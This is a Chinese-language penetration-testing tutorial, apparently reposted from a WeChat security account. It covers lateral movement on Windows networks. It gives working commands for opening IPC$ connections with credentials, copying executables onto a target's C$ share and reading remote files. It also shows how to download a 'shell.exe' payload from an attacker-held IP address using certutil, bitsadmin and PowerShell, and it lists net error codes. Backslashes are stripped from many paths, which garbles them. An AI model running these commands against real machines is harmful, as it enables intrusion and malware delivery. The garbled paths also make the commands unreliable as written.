执行net share命令,可以获得Windows默认开启的网络共享,其中C$为C盘共享,ADMIN$为系统目录共享,还有一个IPC$共享。
IPC(Internet Process Connection)是共享”命令管道”的资源,为了让进程间通信而开放的命令管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
实战中往往会建立IPC$连接,因为通过IPC$连接,不仅可以进行所有文件共享操作,还可以实现其他远程管理操作,如列出远程主机进程、在远程主机上创建计划任务或服务等。
建立IPC$连接需要具备以下两个条件:
①远程主机开启了IPC连接
②远程主机的139端口和445端口开放
# IPC$ 连接
net use \192.168.1.131ipc$ # 建立空连接
net use \192.168.1.131ipc$ "password" /user:"Administrator" # 建立非空连接
# IPC$ 使用
net use # 查看本机建立的连接(本机连接其他机器)
net session # 查看本机建立的连接(其他机器连接的本机),需要administrator用户执行
net share # 查看本地开启的共享
net share ipc$ # 开启ipc$共享
net share ipc$ /del # 删除ipc$共享
net share admin$ /del # 删除admin$共享
net share c$ /del # 删除C盘共享
net use * /del # 删除所有连接
# IPC$ 连接建立之后的操作
dir \192.168.1.131c$ # 列出目标文件目录
copy C:\UsersAdministratorDesktopaaa.exe \192.168.1.131c$bbb # 将aaa.exe文件复制到目标C盘bbb目录下
type \192.168.1.131c$1.txt # 查看目标C盘下1.txt文件内容
net use h: \192.168.52.138c$ # 磁盘映射,将目标的 C 盘映射到本地的 H 盘
net use h: /del # 删除磁盘映射
5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
51:网络问题,Windows 无法找到网络路径
53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题
67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$
1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除
1326:账号密码错误
1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况
2242:用户密码过期,目标有账号策略,强制定期更改密码
建立 IPC 失败的原因
(1)目标系统不是 NT 或以上的操作系统
(2)对方没有打开 IPC$共享
(3)对方未开启 139、445 端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误
AnonymousSMBServer.bat <enable|disable> <dir>
mkdir /root/smbshare python smbserver.py mysmb /root/smbshare -smb2support
Certutil
Certutil 是Windows自带的命令行工具,用于管理Windows证书并作为证书服务器的一部分安装。Certutil提供了从网络下载文件的功能。
certutil -urlcache -split -f http://192.168.1.1:8000/shell.exe c:userspublicshell.exe
//从192.168.1.1:8000下载shell.exe到本地c:userspublic目录下
bitsadmin /transfer test http://192.168.1.1:8000/1.txt c:usersmytoolsa.txt
// 创建一个名为test的bitsadmin任务,从192.168.1.1:8000下载1.txt,保存为c:usersmytoolsa.txt
(New-Object Net.WebClient).DownloadFile("http://192.168.1.1:8000/shell.exe", "c:userspublicshell.exe")
powershell -c "(New-Object Net.WebClient).DownloadFile('http://192.168.1.1:8000/shell.exe','c:userspublicshell.exe')"
原文始发于微信公众号(SecretTeam安全团队):【内网渗透】横向移动基础-文件传输
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论